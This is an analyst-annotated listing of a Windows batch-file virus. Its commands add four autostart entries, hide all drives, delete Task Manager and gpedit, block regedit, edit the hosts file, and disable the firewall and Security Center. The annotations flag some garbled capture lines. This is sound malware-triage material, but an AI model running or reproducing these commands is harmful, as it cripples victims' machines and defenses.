"C:\DOCUME~1\ex3\LOCALS~1\Temp\F8.tmp\batchfile.bat" %systemdrive%\sand.vbs
REM Analyst annotations: the REM lines were added to this captured command listing; every command is unchanged.
REM Summary of what the listing shows: a batch dropper that sets several autostart points, removes or blocks
REM admin tools, edits name-resolution settings, and turns off the host firewall and Security Center.
REM
REM Builds %systemdrive%\sand.vbs with echo, runs it with cscript, then deletes it.
REM The script text calls WScript.Shell regwrite on HKLM\Software\kazza\Transfer\DlDir0 with data C:\WINDOWS\kazza\.
REM NOTE(review): the second echo targets %systemdrive%\.vbs, not sand.vbs, as captured; treat both paths as possible artifacts.
REM NOTE(review): the key name resembles a P2P client's download-directory setting; presumably a file-sharing propagation attempt - confirm.
cmd /c "echo echo.on error resume next > %systemdrive%\sand.vbs"
cmd /c "echo echo set ws = CreateObject("wscript.shell") >> %systemdrive%\.vbs"
cmd /c "echo echo ws.regwrite "HKLM\Software\kazza\Transfer\DlDir0","C:\WINDOWS\kazza\" >> %systemdrive%\sand.vbs"
cscript %systemdrive%\sand.vbs
del %systemdrive%\sand.vbs /q /f
REM Creates C:\WINDOWS\kazza and copies the batch file from the user's Temp\F8.tmp folder into it.
md C:\WINDOWS\kazza
copy "C:\DOCUME~1\ex3\LOCALS~1\Temp\F8.tmp\batchfile.bat" C:\WINDOWS\kazza\
REM Persistence 1: copies the file "xkox" into the All Users Startup folder, so it runs at any user's logon.
copy xkox "%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup"
REM Persistence 2: tank.bat in %windir%, referenced by load= and run= lines appended under a [windows] header in win.ini.
copy xkox %windir%\tank.bat
cmd /c "echo [windows] >> %windir%\win.ini"
cmd /c "echo load=%windir%\tank.bat >> %windir%\win.ini"
cmd /c "echo run=%windir%\tank.bat >> %windir%\win.ini"
cmd /c "echo nullport=None >> %windir%\win.ini"
REM Persistence 3: csrss.bat in system32 (the name mimics a Windows system process), referenced by a shell= line
REM appended under a [boot] header in system.ini.
copy xkox %systemdrive%\WINDOWS\system32\csrss.bat
cmd /c "echo [boot] >> %windir%\system.ini"
cmd /c "echo shell=csrss.exe %systemdrive%\WINDOWS\system32\csrss.bat >> %windir%\system.ini"
REM Persistence 4: oobe.bat in %windir%\system, registered as value "oobe" under the HKLM CurrentVersion\Run key.
copy xkox %windir%\system\oobe.bat
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v oobe /t REG_SZ /d %windir%\system\oobe.bat /f
REM NoDrives = 67108863 (0x03FFFFFF) sets all 26 drive-letter bits, which hides every drive in Explorer.
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f
REM Deletes Task Manager and the Group Policy editor console, which hinders manual inspection and cleanup.
del %windir%\system32\taskmgr.exe /q /f
del %windir%\system32\gpedit.msc /q /f
REM Sets OOBETimer under WPAEvents to DWORD 0.
REM NOTE(review): presumably meant to disturb Windows activation state - confirm.
REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WPAEvents" /v OOBETimer /t REG_DWORD /d 0 /f
REM disableregistrytools = 1 under the HKCU System policies key blocks the registry editor for the current user.
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v disableregistrytools /t reg_dword /d 1 /f
REM Writes rune.vbs, which shows a MsgBox (flag 4096 = system modal) with the author's message, runs it, then deletes it.
cmd /c "echo dim alert >rune.vbs"
cmd /c "echo answer=MsgBox("yes its me my friend easy but bad virus isnt it",4096,"Xkox -- -- has hacked your computer i am so sorry world is bad and you have to be smart to surrvive") >>rune.vbs"
cscript rune.vbs
del rune.vbs /q /f
REM Writes the Tcpip DataBasePath value, which names the directory that holds the hosts file.
REM The Windows default is %SystemRoot%\System32\drivers\etc; compare the stored data against it during triage.
REM NOTE(review): as captured, the closing quote comes after /f.
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\ /v DataBasePath /t REG_EXPAND_SZ /d "%systemroot%\System32\drivers\etc /f"
REM Appends entries naming four sites to the hosts file.
REM NOTE(review): each command is split across two lines in this listing and no address is visible before the
REM host name, so the capture may be incomplete. Triage: review the hosts file for lines naming these domains.
cmd /c "echo
www.google.com >>%systemdrive%\WINDOWS\system32\Drivers\Etc\Hosts"
cmd /c "echo
www.google.bg >>%systemdrive%\WINDOWS\system32\Drivers\Etc\Hosts"
cmd /c "echo
www.abv.bg >>%systemdrive%\WINDOWS\system32\Drivers\Etc\Hosts"
cmd /c "echo
www.youtube.com >>%systemdrive%\WINDOWS\system32\Drivers\Etc\Hosts"
REM Stops the Security Center and SharedAccess (firewall/ICS) services and disables the Windows Firewall via netsh.
REM The typographic quotes around Security Center are reproduced as captured.
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
REM Writes 15789.bat (a label, two tskill lines and a goto back to the label, i.e. an endless loop) and starts it minimized.
REM NOTE(review): the tskill arguments look empty or truncated in this capture.
cmd /c "echo :foieht >15789.bat"
cmd /c "echo tskill >>15789.bat"
cmd /c "echo tskill n >>15789.bat"
cmd /c "echo goto foieht >>15789.bat"
start /min 15789.bat
toq nego zasicha nod32 i kaspersky  [transliterated Bulgarian; roughly: "this one is detected by NOD32 and Kaspersky"]